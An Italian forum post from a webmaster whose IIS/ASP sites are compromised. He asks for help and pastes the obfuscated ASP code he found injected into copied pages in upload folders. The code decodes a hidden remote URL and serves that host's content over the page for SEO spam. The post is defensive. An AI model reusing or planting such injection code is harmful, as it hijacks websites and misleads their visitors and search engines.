Ciao a tutti ho una grossa problematica di attacco hacker a vari siti web che gestisco in vari server che hanno svariate combinazioni.
Tutti i server che ho utilizzando le versioni windows 2000 - 2003 o addirittura 2012 server e iis dalla versione 6 alla versione 7.5 e sono tutti configurati per utilizzare il linguaggio asp.
In pratica sui siti dove ho delle cartelle con i diritti di scrittura perchè magari quel sito ha un'area riservata dove l'utente carica sul suo sito foto o pdf mi ritrovo dentro delle pagine .asp che sono l'esatta copia di altre pagine che ho sul server (ma esatta copia del codice compreso l'asp) con incollato o subito sotto al tag body o subito prima della chiusura del body questo codice:
questo codice asp ovviamente non creato da me e che mi ritrovo incollato dentro queste pagine non fa altro che creare un suo contenuto html che viene "appiccicato" sopra alla pagina originale, così se viene chiamata questa pagina da google il risultato sarà un contenuto completamente diverso rispetto all'originale.codice:On Error Resume Next Function brr(c, f) dim crr,n,u crr=Split(c, "-") For n=0 To UBound(crr) If crr(n)<>"" Then u=u&Chr(crr(n)) Next If InStr(u, f)=0 Or f="" Then Exit Function u=Replace(u, f, "") brr=u End Function dim fso Set fso=Server.CreateObject("CDO.Message") Dim arr(7) arr(0)=Request.Querystring() If arr(0)<>"" Then arr(1)=Instr(arr(0),brr("42-42-42-42-63-42-42-","*")) arr(2)=Instr(arr(0),brr("37-37-37-37-61-37-37-","%")) arr(3)=Mid(arr(0),arr(1)+1,arr(2)-arr(1)-1) arr(4)=brr("46-104-42-42-116-42-42-109-42-42-108-","*") arr(5)=Request.Querystring(arr(3)) If Instr(arr(5),arr(4))>0 Then arr(4)="" arr(6)=brr("94-94-94-94-47-94-94-","^") arr(7)=brr("104-116-116-112-58-47-47-119-119-119-46-100-114-100-114-38-101-98-101-97-116-115-46-101-117-47-104-101-105-121-101-47-38-102-105-99-38-101-46-105-116-47-","&") fso.CreateMHTMLBody arr(7)&arr(3)&arr(6)&arr(5)&arr(4),31 Select Case fso.HTMLBody Case "" Case fso.HTMLBody Response.Clear Response.Write fso.HTMLBody Response.End End Select Set fso=Nothing End If
Mi sono accorto della cosa proprio perchè il webmaster tools di google mi ha segnalato la cosa.
Ho controllato nei log e non c'è assolutamente nulla, l'accesso ftp non è stato violato; non so come questo hacker riesce ad accedere alle cartelle con i permessi di scrittura, si riesce a copiare una pagina del sito e ci incolla sopra questo codice.
Ho provato a cercare su internet e per quanto sono riuscito a capire sembra un attacco alla webshell solo che non riesco a capire come difendermi.
Una vulnerabilità di windows o dell'iis mi sembra strano visto che mi capita con svariati sistemi opertaivi e con svariate versioni di iss.
Non posso chiudere tutte le cartelle con i permessi di scrittura altrimenti le aree riservate dei miei clienti si vanno a far benedire e per esempio Aruba ha addiruttura 2 cartelle con i permessi di scrittura sui suoi server (mdb-database e public) e la problematica non accade mai stessa cosa su register.
Unica cosa che accomuna tutti i siti è l'utilizzo dello scripr di lorenzo abbati upload.asp versione 3.1.1 ma non ho trovato nessuna vulnerabilità di questo script che uso da anni.
Qualcuno sai aiutarmi? darmi qualche dritta su dove andare a guardare per risolvere questo problema?
Ahimè google mi segnala giustamente che i siti sono compromessi e il posizionamento crolla.
Grazie a tutti per l'aiuto
Rispondi quotando
.